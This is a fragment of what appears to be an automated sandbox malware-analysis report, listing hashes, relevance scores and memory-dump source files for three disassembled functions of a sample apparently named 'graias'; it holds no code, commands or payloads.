                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2136311172-0
                                                                                                                                                                                                                                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                                            Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                            • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                                                            Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                            • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                                                                                                            • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E